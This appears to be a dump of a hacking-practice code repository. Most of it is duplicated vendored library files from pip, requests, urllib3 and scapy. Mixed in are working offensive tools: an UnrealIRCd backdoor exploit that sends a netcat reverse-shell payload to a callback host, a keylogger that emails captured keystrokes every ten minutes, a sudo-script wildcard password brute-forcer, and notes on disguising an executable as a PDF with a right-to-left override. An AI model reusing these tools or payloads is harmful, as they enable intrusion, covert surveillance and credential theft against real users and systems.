19 | 20 | try: 21 | from pip._vendor.requests.packages.urllib3.util import is_fp_closed 22 | except ImportError: 23 | from pip._vendor.urllib3.util import is_fp_closed 24 | 25 | # Replicate some six behaviour 26 | try: 27 | text_type = unicode 28 | except NameError: 29 | text_type = str 30 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/html5lib/treeadapters/__init__.py: -------------------------------------------------------------------------------- 1 | """Tree adapters let you convert from one tree structure to another 2 | 3 | Example: 4 | 5 | .. code-block:: python 6 | 7 | from pip._vendor import html5lib 8 | from pip._vendor.html5lib.treeadapters import genshi 9 | 10 | doc = 'Hi!' 11 | treebuilder = html5lib.getTreeBuilder('etree') 12 | parser = html5lib.HTMLParser(tree=treebuilder) 13 | tree = parser.parse(doc) 14 | TreeWalker = html5lib.getTreeWalker('etree') 15 | 16 | genshi_tree = genshi.to_genshi(TreeWalker(tree)) 17 | 18 | """ 19 | from __future__ import absolute_import, division, unicode_literals 20 | 21 | from . import sax 22 | 23 | __all__ = ["sax"] 24 | 25 | try: 26 | from . import genshi # noqa 27 | except ImportError: 28 | pass 29 | else: 30 | __all__.append("genshi") 31 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/compat.py: -------------------------------------------------------------------------------- 1 | try: 2 | from urllib.parse import urljoin 3 | except ImportError: 4 | from urlparse import urljoin 5 | 6 | 7 | try: 8 | import cPickle as pickle 9 | except ImportError: 10 | import pickle 11 | 12 | 13 | # Handle the case where the requests module has been patched to not have 14 | # urllib3 bundled as part of its source. 15 | try: 16 | from pip._vendor.requests.packages.urllib3.response import HTTPResponse 17 | except ImportError: 18 | from pip._vendor.urllib3.response import HTTPResponse 19 | 20 | try: 21 | from pip._vendor.requests.packages.urllib3.util import is_fp_closed 22 | except ImportError: 23 | from pip._vendor.urllib3.util import is_fp_closed 24 | 25 | # Replicate some six behaviour 26 | try: 27 | text_type = unicode 28 | except NameError: 29 | text_type = str 30 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/html5lib/treeadapters/__init__.py: -------------------------------------------------------------------------------- 1 | """Tree adapters let you convert from one tree structure to another 2 | 3 | Example: 4 | 5 | .. code-block:: python 6 | 7 | from pip._vendor import html5lib 8 | from pip._vendor.html5lib.treeadapters import genshi 9 | 10 | doc = 'Hi!' 11 | treebuilder = html5lib.getTreeBuilder('etree') 12 | parser = html5lib.HTMLParser(tree=treebuilder) 13 | tree = parser.parse(doc) 14 | TreeWalker = html5lib.getTreeWalker('etree') 15 | 16 | genshi_tree = genshi.to_genshi(TreeWalker(tree)) 17 | 18 | """ 19 | from __future__ import absolute_import, division, unicode_literals 20 | 21 | from . import sax 22 | 23 | __all__ = ["sax"] 24 | 25 | try: 26 | from . import genshi # noqa 27 | except ImportError: 28 | pass 29 | else: 30 | __all__.append("genshi") 31 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/packaging/__about__.py: -------------------------------------------------------------------------------- 1 | # This file is dual licensed under the terms of the Apache License, Version 2 | # 2.0, and the BSD License. See the LICENSE file in the root of this repository 3 | # for complete details. 4 | from __future__ import absolute_import, division, print_function 5 | 6 | __all__ = [ 7 | "__title__", 8 | "__summary__", 9 | "__uri__", 10 | "__version__", 11 | "__author__", 12 | "__email__", 13 | "__license__", 14 | "__copyright__", 15 | ] 16 | 17 | __title__ = "packaging" 18 | __summary__ = "Core utilities for Python packages" 19 | __uri__ = "https://github.com/pypa/packaging" 20 | 21 | __version__ = "19.0" 22 | 23 | __author__ = "Donald Stufft and individual contributors" 24 | __email__ = "donald@stufft.io" 25 | 26 | __license__ = "BSD or Apache License, Version 2.0" 27 | __copyright__ = "Copyright 2014-2019 %s" % __author__ 28 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/contrib/_appengine_environ.py: -------------------------------------------------------------------------------- 1 | """ 2 | This module provides means to detect the App Engine environment. 3 | """ 4 | 5 | import os 6 | 7 | 8 | def is_appengine(): 9 | return (is_local_appengine() or 10 | is_prod_appengine() or 11 | is_prod_appengine_mvms()) 12 | 13 | 14 | def is_appengine_sandbox(): 15 | return is_appengine() and not is_prod_appengine_mvms() 16 | 17 | 18 | def is_local_appengine(): 19 | return ('APPENGINE_RUNTIME' in os.environ and 20 | 'Development/' in os.environ['SERVER_SOFTWARE']) 21 | 22 | 23 | def is_prod_appengine(): 24 | return ('APPENGINE_RUNTIME' in os.environ and 25 | 'Google App Engine/' in os.environ['SERVER_SOFTWARE'] and 26 | not is_prod_appengine_mvms()) 27 | 28 | 29 | def is_prod_appengine_mvms(): 30 | return os.environ.get('GAE_VM', False) == 'true' 31 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/packaging/__about__.py: -------------------------------------------------------------------------------- 1 | # This file is dual licensed under the terms of the Apache License, Version 2 | # 2.0, and the BSD License. See the LICENSE file in the root of this repository 3 | # for complete details. 4 | from __future__ import absolute_import, division, print_function 5 | 6 | __all__ = [ 7 | "__title__", 8 | "__summary__", 9 | "__uri__", 10 | "__version__", 11 | "__author__", 12 | "__email__", 13 | "__license__", 14 | "__copyright__", 15 | ] 16 | 17 | __title__ = "packaging" 18 | __summary__ = "Core utilities for Python packages" 19 | __uri__ = "https://github.com/pypa/packaging" 20 | 21 | __version__ = "19.0" 22 | 23 | __author__ = "Donald Stufft and individual contributors" 24 | __email__ = "donald@stufft.io" 25 | 26 | __license__ = "BSD or Apache License, Version 2.0" 27 | __copyright__ = "Copyright 2014-2019 %s" % __author__ 28 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/contrib/_appengine_environ.py: -------------------------------------------------------------------------------- 1 | """ 2 | This module provides means to detect the App Engine environment. 3 | """ 4 | 5 | import os 6 | 7 | 8 | def is_appengine(): 9 | return (is_local_appengine() or 10 | is_prod_appengine() or 11 | is_prod_appengine_mvms()) 12 | 13 | 14 | def is_appengine_sandbox(): 15 | return is_appengine() and not is_prod_appengine_mvms() 16 | 17 | 18 | def is_local_appengine(): 19 | return ('APPENGINE_RUNTIME' in os.environ and 20 | 'Development/' in os.environ['SERVER_SOFTWARE']) 21 | 22 | 23 | def is_prod_appengine(): 24 | return ('APPENGINE_RUNTIME' in os.environ and 25 | 'Google App Engine/' in os.environ['SERVER_SOFTWARE'] and 26 | not is_prod_appengine_mvms()) 27 | 28 | 29 | def is_prod_appengine_mvms(): 30 | return os.environ.get('GAE_VM', False) == 'true' 31 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/packaging/__about__.py: -------------------------------------------------------------------------------- 1 | # This file is dual licensed under the terms of the Apache License, Version 2 | # 2.0, and the BSD License. See the LICENSE file in the root of this repository 3 | # for complete details. 4 | from __future__ import absolute_import, division, print_function 5 | 6 | __all__ = [ 7 | "__title__", 8 | "__summary__", 9 | "__uri__", 10 | "__version__", 11 | "__author__", 12 | "__email__", 13 | "__license__", 14 | "__copyright__", 15 | ] 16 | 17 | __title__ = "packaging" 18 | __summary__ = "Core utilities for Python packages" 19 | __uri__ = "https://github.com/pypa/packaging" 20 | 21 | __version__ = "19.0" 22 | 23 | __author__ = "Donald Stufft and individual contributors" 24 | __email__ = "donald@stufft.io" 25 | 26 | __license__ = "BSD or Apache License, Version 2.0" 27 | __copyright__ = "Copyright 2014-2019 %s" % __author__ 28 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/contrib/_appengine_environ.py: -------------------------------------------------------------------------------- 1 | """ 2 | This module provides means to detect the App Engine environment. 3 | """ 4 | 5 | import os 6 | 7 | 8 | def is_appengine(): 9 | return (is_local_appengine() or 10 | is_prod_appengine() or 11 | is_prod_appengine_mvms()) 12 | 13 | 14 | def is_appengine_sandbox(): 15 | return is_appengine() and not is_prod_appengine_mvms() 16 | 17 | 18 | def is_local_appengine(): 19 | return ('APPENGINE_RUNTIME' in os.environ and 20 | 'Development/' in os.environ['SERVER_SOFTWARE']) 21 | 22 | 23 | def is_prod_appengine(): 24 | return ('APPENGINE_RUNTIME' in os.environ and 25 | 'Google App Engine/' in os.environ['SERVER_SOFTWARE'] and 26 | not is_prod_appengine_mvms()) 27 | 28 | 29 | def is_prod_appengine_mvms(): 30 | return os.environ.get('GAE_VM', False) == 'true' 31 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/requests/hooks.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | """ 4 | requests.hooks 5 | ~~~~~~~~~~~~~~ 6 | 7 | This module provides the capabilities for the Requests hooks system. 8 | 9 | Available hooks: 10 | 11 | ``response``: 12 | The response generated from a Request. 13 | """ 14 | HOOKS = ['response'] 15 | 16 | 17 | def default_hooks(): 18 | return {event: [] for event in HOOKS} 19 | 20 | # TODO: response is the only one 21 | 22 | 23 | def dispatch_hook(key, hooks, hook_data, **kwargs): 24 | """Dispatches a hook dictionary on a given piece of data.""" 25 | hooks = hooks or {} 26 | hooks = hooks.get(key) 27 | if hooks: 28 | if hasattr(hooks, '__call__'): 29 | hooks = [hooks] 30 | for hook in hooks: 31 | _hook_data = hook(hook_data, **kwargs) 32 | if _hook_data is not None: 33 | hook_data = _hook_data 34 | return hook_data 35 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/layers/all.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Philippe Biondi 4 | # This program is published under a GPLv2 license 5 | 6 | """ 7 | All layers. Configurable with conf.load_layers. 8 | """ 9 | 10 | from __future__ import absolute_import 11 | from scapy.config import conf 12 | from scapy.error import log_loading 13 | from scapy.main import load_layer 14 | import logging 15 | import scapy.modules.six as six 16 | 17 | ignored = list(six.moves.builtins.__dict__) + ["sys"] 18 | log = logging.getLogger("scapy.loading") 19 | 20 | __all__ = [] 21 | 22 | for _l in conf.load_layers: 23 | log_loading.debug("Loading layer %s" % _l) 24 | try: 25 | load_layer(_l, globals_dict=globals(), symb_list=__all__) 26 | except Exception as e: 27 | log.warning("can't import layer %s: %s", _l, e) 28 | 29 | del _l 30 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/requests/hooks.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | """ 4 | requests.hooks 5 | ~~~~~~~~~~~~~~ 6 | 7 | This module provides the capabilities for the Requests hooks system. 8 | 9 | Available hooks: 10 | 11 | ``response``: 12 | The response generated from a Request. 13 | """ 14 | HOOKS = ['response'] 15 | 16 | 17 | def default_hooks(): 18 | return {event: [] for event in HOOKS} 19 | 20 | # TODO: response is the only one 21 | 22 | 23 | def dispatch_hook(key, hooks, hook_data, **kwargs): 24 | """Dispatches a hook dictionary on a given piece of data.""" 25 | hooks = hooks or {} 26 | hooks = hooks.get(key) 27 | if hooks: 28 | if hasattr(hooks, '__call__'): 29 | hooks = [hooks] 30 | for hook in hooks: 31 | _hook_data = hook(hook_data, **kwargs) 32 | if _hook_data is not None: 33 | hook_data = _hook_data 34 | return hook_data 35 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/requests/hooks.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | """ 4 | requests.hooks 5 | ~~~~~~~~~~~~~~ 6 | 7 | This module provides the capabilities for the Requests hooks system. 8 | 9 | Available hooks: 10 | 11 | ``response``: 12 | The response generated from a Request. 13 | """ 14 | HOOKS = ['response'] 15 | 16 | 17 | def default_hooks(): 18 | return {event: [] for event in HOOKS} 19 | 20 | # TODO: response is the only one 21 | 22 | 23 | def dispatch_hook(key, hooks, hook_data, **kwargs): 24 | """Dispatches a hook dictionary on a given piece of data.""" 25 | hooks = hooks or {} 26 | hooks = hooks.get(key) 27 | if hooks: 28 | if hasattr(hooks, '__call__'): 29 | hooks = [hooks] 30 | for hook in hooks: 31 | _hook_data = hook(hook_data, **kwargs) 32 | if _hook_data is not None: 33 | hook_data = _hook_data 34 | return hook_data 35 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/requests/hooks.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | """ 4 | requests.hooks 5 | ~~~~~~~~~~~~~~ 6 | 7 | This module provides the capabilities for the Requests hooks system. 8 | 9 | Available hooks: 10 | 11 | ``response``: 12 | The response generated from a Request. 13 | """ 14 | HOOKS = ['response'] 15 | 16 | 17 | def default_hooks(): 18 | return {event: [] for event in HOOKS} 19 | 20 | # TODO: response is the only one 21 | 22 | 23 | def dispatch_hook(key, hooks, hook_data, **kwargs): 24 | """Dispatches a hook dictionary on a given piece of data.""" 25 | hooks = hooks or {} 26 | hooks = hooks.get(key) 27 | if hooks: 28 | if hasattr(hooks, '__call__'): 29 | hooks = [hooks] 30 | for hook in hooks: 31 | _hook_data = hook(hook_data, **kwargs) 32 | if _hook_data is not None: 33 | hook_data = _hook_data 34 | return hook_data 35 | -------------------------------------------------------------------------------- /Brute_Force/script2.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import string 3 | 4 | def main(): 5 | chars=list(string.ascii_letters+string.digits) #Make a list of all characters possible(alphabets and numbers) 6 | pswd="" 7 | check=0 #Will check if all password characters found or not. 8 | 9 | while check==0: 10 | for char in chars: 11 | cmd=f"echo '{pswd}{char}*' | sudo /opt/scripts/mysql-backup.sh" 12 | out=subprocess.run(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,text=True).stdout 13 | if "Password confirmed!" in out: 14 | pswd+=char 15 | break #If character found break the loop 16 | else: #Redundant and added just such that you don't get confused with the below else statement. 17 | pass 18 | else: #If no character matched which means all of the characters were found. 19 | check=1 20 | print("[+] Password: "+pswd) 21 | 22 | if __name__=="__main__": 23 | main() 24 | -------------------------------------------------------------------------------- /unreal_irc_backdoor/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | import subprocess 5 | import sys 6 | 7 | if len(sys.argv) != 5: 8 | print(f"Usage: {sys.argv[0]} [target_ip] [target_port] [callback ip] [callback port]") 9 | sys.exit() 10 | 11 | rhost, rport, lhost, lport = sys.argv[1:] 12 | 13 | print(f"[*] Connecting to {rhost}:{rport}") 14 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | try: 16 | s.connect((rhost, int(rport))) 17 | except: 18 | print(f"[-] Failed to connect to {rhost}:{rport}") 19 | sys.exit(1) 20 | s.recv(100) 21 | 22 | print("[*] Sending payload") 23 | s.send(f"AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {lhost} {lport} >/tmp/f\n".encode()) 24 | s.close() 25 | print("[+] Payload sent. Closing socket.") 26 | 27 | print("[*] Opening listener. Callback should come within a minute") 28 | try: 29 | ncsh = subprocess.Popen(f"nc -nl {lhost} {lport}", shell=True) 30 | ncsh.poll() 31 | ncsh.wait() 32 | except: 33 | print("\n[!] Exiting shell") 34 | -------------------------------------------------------------------------------- /KeyLogger/key_logger.py: -------------------------------------------------------------------------------- 1 | import pynput.keyboard 2 | import smtplib 3 | import threading 4 | 5 | log = "" 6 | def callback_function(key): 7 | global log 8 | try: 9 | log = log + key.char.encode("utf-8") 10 | except AttributeError: 11 | if key == key.space: 12 | log = log + " " 13 | else: 14 | log = log + str(key) 15 | 16 | print(log) 17 | 18 | def send_email(email, password, message): 19 | email_server = smtplib.SMTP("smtp.gmail.com", 587) 20 | email_server.starttls() 21 | email_server.login(email, password) 22 | email_server.sendmail(email, email, message) 23 | email_server.quit() 24 | 25 | def thread_function(): 26 | global log 27 | send_email("mail@gmail.com", "password", log) 28 | log = "" 29 | timer_object = threading.Timer(600, thread_function) 30 | timer_object.start() 31 | 32 | keylogger_listener = pynput.keyboard.Listener(on_press=callback_function) 33 | with keylogger_listener: 34 | thread_function() 35 | keylogger_listener.join() 36 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/cache.py: -------------------------------------------------------------------------------- 1 | """ 2 | The cache object API for implementing caches. The default is a thread 3 | safe in-memory dictionary. 4 | """ 5 | from threading import Lock 6 | 7 | 8 | class BaseCache(object): 9 | 10 | def get(self, key): 11 | raise NotImplementedError() 12 | 13 | def set(self, key, value): 14 | raise NotImplementedError() 15 | 16 | def delete(self, key): 17 | raise NotImplementedError() 18 | 19 | def close(self): 20 | pass 21 | 22 | 23 | class DictCache(BaseCache): 24 | 25 | def __init__(self, init_dict=None): 26 | self.lock = Lock() 27 | self.data = init_dict or {} 28 | 29 | def get(self, key): 30 | return self.data.get(key, None) 31 | 32 | def set(self, key, value): 33 | with self.lock: 34 | self.data.update({key: value}) 35 | 36 | def delete(self, key): 37 | with self.lock: 38 | if key in self.data: 39 | self.data.pop(key) 40 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/cache.py: -------------------------------------------------------------------------------- 1 | """ 2 | The cache object API for implementing caches. The default is a thread 3 | safe in-memory dictionary. 4 | """ 5 | from threading import Lock 6 | 7 | 8 | class BaseCache(object): 9 | 10 | def get(self, key): 11 | raise NotImplementedError() 12 | 13 | def set(self, key, value): 14 | raise NotImplementedError() 15 | 16 | def delete(self, key): 17 | raise NotImplementedError() 18 | 19 | def close(self): 20 | pass 21 | 22 | 23 | class DictCache(BaseCache): 24 | 25 | def __init__(self, init_dict=None): 26 | self.lock = Lock() 27 | self.data = init_dict or {} 28 | 29 | def get(self, key): 30 | return self.data.get(key, None) 31 | 32 | def set(self, key, value): 33 | with self.lock: 34 | self.data.update({key: value}) 35 | 36 | def delete(self, key): 37 | with self.lock: 38 | if key in self.data: 39 | self.data.pop(key) 40 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/cache.py: -------------------------------------------------------------------------------- 1 | """ 2 | The cache object API for implementing caches. The default is a thread 3 | safe in-memory dictionary. 4 | """ 5 | from threading import Lock 6 | 7 | 8 | class BaseCache(object): 9 | 10 | def get(self, key): 11 | raise NotImplementedError() 12 | 13 | def set(self, key, value): 14 | raise NotImplementedError() 15 | 16 | def delete(self, key): 17 | raise NotImplementedError() 18 | 19 | def close(self): 20 | pass 21 | 22 | 23 | class DictCache(BaseCache): 24 | 25 | def __init__(self, init_dict=None): 26 | self.lock = Lock() 27 | self.data = init_dict or {} 28 | 29 | def get(self, key): 30 | return self.data.get(key, None) 31 | 32 | def set(self, key, value): 33 | with self.lock: 34 | self.data.update({key: value}) 35 | 36 | def delete(self, key): 37 | with self.lock: 38 | if key in self.data: 39 | self.data.pop(key) 40 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/packaging/_compat.py: -------------------------------------------------------------------------------- 1 | # This file is dual licensed under the terms of the Apache License, Version 2 | # 2.0, and the BSD License. See the LICENSE file in the root of this repository 3 | # for complete details. 4 | from __future__ import absolute_import, division, print_function 5 | 6 | import sys 7 | 8 | 9 | PY2 = sys.version_info[0] == 2 10 | PY3 = sys.version_info[0] == 3 11 | 12 | # flake8: noqa 13 | 14 | if PY3: 15 | string_types = (str,) 16 | else: 17 | string_types = (basestring,) 18 | 19 | 20 | def with_metaclass(meta, *bases): 21 | """ 22 | Create a base class with a metaclass. 23 | """ 24 | # This requires a bit of explanation: the basic idea is to make a dummy 25 | # metaclass for one level of class instantiation that replaces itself with 26 | # the actual metaclass. 27 | class metaclass(meta): 28 | def __new__(cls, name, this_bases, d): 29 | return meta(name, bases, d) 30 | 31 | return type.__new__(metaclass, "temporary_class", (), {}) 32 | -------------------------------------------------------------------------------- /Package/readme.txt: -------------------------------------------------------------------------------- 1 | 2 | on Windows command line: 3 | 4 | C:\Users\root\AppData\Local\Programs\Python\Python38-32\Scripts\pyinstaller.exe package.py --onefile --add-data "C:\Users\root\Desktop\Python\python.exe -m pip install pyinstaller 5 | 6 | 7 | C:\Users\root\AppData\Local\Programs\Python\Python38-32\Scripts\pyinstaller.exe package.py --onefile --add-data "C:\Users\root\Desktop\Python\sublimetext\Ceh.pdf;." 8 | 9 | 10 | C:\Users\root\AppData\Local\Programs\Python\Python38-32\Scripts\pyinstaller.exe package.py --onefile --add-data "C:\Users\root\Desktop\Python\sublimetext\Ceh.pdf;." --noconsole 11 | 12 | 13 | C:\Users\root\AppData\Local\Programs\Python\Python38-32\Scripts\pyinstaller.exe package.py --onefile --add-data "C:\Users\root\Desktop\Python\sublimetext\Ceh.pdf;." --noconsole --icon pdf.ico 14 | 15 | 16 | on Kali Linux terminal: 17 | 18 | Open new Leafpad and copy/paste file name on it as "file_name_fdp.exe" 19 | 20 | Characters-->search-->Right-to-left-override-->copy-->ctrl+v to the beginning of "f" and after that it replaces it as file_name_exe.pdf 21 | 22 | 23 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/certifi-2019.11.28.dist-info/metadata.json: -------------------------------------------------------------------------------- 1 | {"classifiers": ["Development Status :: 5 - Production/Stable", "Intended Audience :: Developers", "License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)", "Natural Language :: English", "Programming Language :: Python", "Programming Language :: Python :: 2", "Programming Language :: Python :: 2.6", "Programming Language :: Python :: 2.7", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.3", "Programming Language :: Python :: 3.4", "Programming Language :: Python :: 3.5", "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7"], "extensions": {"python.details": {"contacts": [{"email": "me@kennethreitz.com", "name": "Kenneth Reitz", "role": "author"}], "document_names": {"description": "DESCRIPTION.rst"}, "project_urls": {"Home": "https://certifi.io/"}}}, "generator": "bdist_wheel (0.30.0.a0)", "license": "MPL-2.0", "metadata_version": "2.0", "name": "certifi", "summary": "Python package for providing Mozilla's CA Bundle.", "version": "2019.11.28"} -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/packaging/_compat.py: -------------------------------------------------------------------------------- 1 | # This file is dual licensed under the terms of the Apache License, Version 2 | # 2.0, and the BSD License. See the LICENSE file in the root of this repository 3 | # for complete details. 4 | from __future__ import absolute_import, division, print_function 5 | 6 | import sys 7 | 8 | 9 | PY2 = sys.version_info[0] == 2 10 | PY3 = sys.version_info[0] == 3 11 | 12 | # flake8: noqa 13 | 14 | if PY3: 15 | string_types = (str,) 16 | else: 17 | string_types = (basestring,) 18 | 19 | 20 | def with_metaclass(meta, *bases): 21 | """ 22 | Create a base class with a metaclass. 23 | """ 24 | # This requires a bit of explanation: the basic idea is to make a dummy 25 | # metaclass for one level of class instantiation that replaces itself with 26 | # the actual metaclass. 27 | class metaclass(meta): 28 | def __new__(cls, name, this_bases, d): 29 | return meta(name, bases, d) 30 | 31 | return type.__new__(metaclass, "temporary_class", (), {}) 32 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/packaging/_compat.py: -------------------------------------------------------------------------------- 1 | # This file is dual licensed under the terms of the Apache License, Version 2 | # 2.0, and the BSD License. See the LICENSE file in the root of this repository 3 | # for complete details. 4 | from __future__ import absolute_import, division, print_function 5 | 6 | import sys 7 | 8 | 9 | PY2 = sys.version_info[0] == 2 10 | PY3 = sys.version_info[0] == 3 11 | 12 | # flake8: noqa 13 | 14 | if PY3: 15 | string_types = (str,) 16 | else: 17 | string_types = (basestring,) 18 | 19 | 20 | def with_metaclass(meta, *bases): 21 | """ 22 | Create a base class with a metaclass. 23 | """ 24 | # This requires a bit of explanation: the basic idea is to make a dummy 25 | # metaclass for one level of class instantiation that replaces itself with 26 | # the actual metaclass. 27 | class metaclass(meta): 28 | def __new__(cls, name, this_bases, d): 29 | return meta(name, bases, d) 30 | 31 | return type.__new__(metaclass, "temporary_class", (), {}) 32 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/caches/redis_cache.py: -------------------------------------------------------------------------------- 1 | from __future__ import division 2 | 3 | from datetime import datetime 4 | from pip._vendor.cachecontrol.cache import BaseCache 5 | 6 | 7 | class RedisCache(BaseCache): 8 | 9 | def __init__(self, conn): 10 | self.conn = conn 11 | 12 | def get(self, key): 13 | return self.conn.get(key) 14 | 15 | def set(self, key, value, expires=None): 16 | if not expires: 17 | self.conn.set(key, value) 18 | else: 19 | expires = expires - datetime.utcnow() 20 | self.conn.setex(key, int(expires.total_seconds()), value) 21 | 22 | def delete(self, key): 23 | self.conn.delete(key) 24 | 25 | def clear(self): 26 | """Helper for clearing all the keys in a database. Use with 27 | caution!""" 28 | for key in self.conn.keys(): 29 | self.conn.delete(key) 30 | 31 | def close(self): 32 | """Redis uses connection pooling, no need to close the connection.""" 33 | pass 34 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/caches/redis_cache.py: -------------------------------------------------------------------------------- 1 | from __future__ import division 2 | 3 | from datetime import datetime 4 | from pip._vendor.cachecontrol.cache import BaseCache 5 | 6 | 7 | class RedisCache(BaseCache): 8 | 9 | def __init__(self, conn): 10 | self.conn = conn 11 | 12 | def get(self, key): 13 | return self.conn.get(key) 14 | 15 | def set(self, key, value, expires=None): 16 | if not expires: 17 | self.conn.set(key, value) 18 | else: 19 | expires = expires - datetime.utcnow() 20 | self.conn.setex(key, int(expires.total_seconds()), value) 21 | 22 | def delete(self, key): 23 | self.conn.delete(key) 24 | 25 | def clear(self): 26 | """Helper for clearing all the keys in a database. Use with 27 | caution!""" 28 | for key in self.conn.keys(): 29 | self.conn.delete(key) 30 | 31 | def close(self): 32 | """Redis uses connection pooling, no need to close the connection.""" 33 | pass 34 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/caches/redis_cache.py: -------------------------------------------------------------------------------- 1 | from __future__ import division 2 | 3 | from datetime import datetime 4 | from pip._vendor.cachecontrol.cache import BaseCache 5 | 6 | 7 | class RedisCache(BaseCache): 8 | 9 | def __init__(self, conn): 10 | self.conn = conn 11 | 12 | def get(self, key): 13 | return self.conn.get(key) 14 | 15 | def set(self, key, value, expires=None): 16 | if not expires: 17 | self.conn.set(key, value) 18 | else: 19 | expires = expires - datetime.utcnow() 20 | self.conn.setex(key, int(expires.total_seconds()), value) 21 | 22 | def delete(self, key): 23 | self.conn.delete(key) 24 | 25 | def clear(self): 26 | """Helper for clearing all the keys in a database. Use with 27 | caution!""" 28 | for key in self.conn.keys(): 29 | self.conn.delete(key) 30 | 31 | def close(self): 32 | """Redis uses connection pooling, no need to close the connection.""" 33 | pass 34 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/contrib/_appengine_environ.py: -------------------------------------------------------------------------------- 1 | """ 2 | This module provides means to detect the App Engine environment. 3 | """ 4 | 5 | import os 6 | 7 | 8 | def is_appengine(): 9 | return "APPENGINE_RUNTIME" in os.environ 10 | 11 | 12 | def is_appengine_sandbox(): 13 | """Reports if the app is running in the first generation sandbox. 14 | 15 | The second generation runtimes are technically still in a sandbox, but it 16 | is much less restrictive, so generally you shouldn't need to check for it. 17 | see https://cloud.google.com/appengine/docs/standard/runtimes 18 | """ 19 | return is_appengine() and os.environ["APPENGINE_RUNTIME"] == "python27" 20 | 21 | 22 | def is_local_appengine(): 23 | return is_appengine() and os.environ.get("SERVER_SOFTWARE", "").startswith( 24 | "Development/" 25 | ) 26 | 27 | 28 | def is_prod_appengine(): 29 | return is_appengine() and os.environ.get("SERVER_SOFTWARE", "").startswith( 30 | "Google App Engine/" 31 | ) 32 | 33 | 34 | def is_prod_appengine_mvms(): 35 | """Deprecated.""" 36 | return False 37 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/html5lib/filters/alphabeticalattributes.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import, division, unicode_literals 2 | 3 | from . import base 4 | 5 | from collections import OrderedDict 6 | 7 | 8 | def _attr_key(attr): 9 | """Return an appropriate key for an attribute for sorting 10 | 11 | Attributes have a namespace that can be either ``None`` or a string. We 12 | can't compare the two because they're different types, so we convert 13 | ``None`` to an empty string first. 14 | 15 | """ 16 | return (attr[0][0] or ''), attr[0][1] 17 | 18 | 19 | class Filter(base.Filter): 20 | """Alphabetizes attributes for elements""" 21 | def __iter__(self): 22 | for token in base.Filter.__iter__(self): 23 | if token["type"] in ("StartTag", "EmptyTag"): 24 | attrs = OrderedDict() 25 | for name, value in sorted(token["data"].items(), 26 | key=_attr_key): 27 | attrs[name] = value 28 | token["data"] = attrs 29 | yield token 30 | -------------------------------------------------------------------------------- 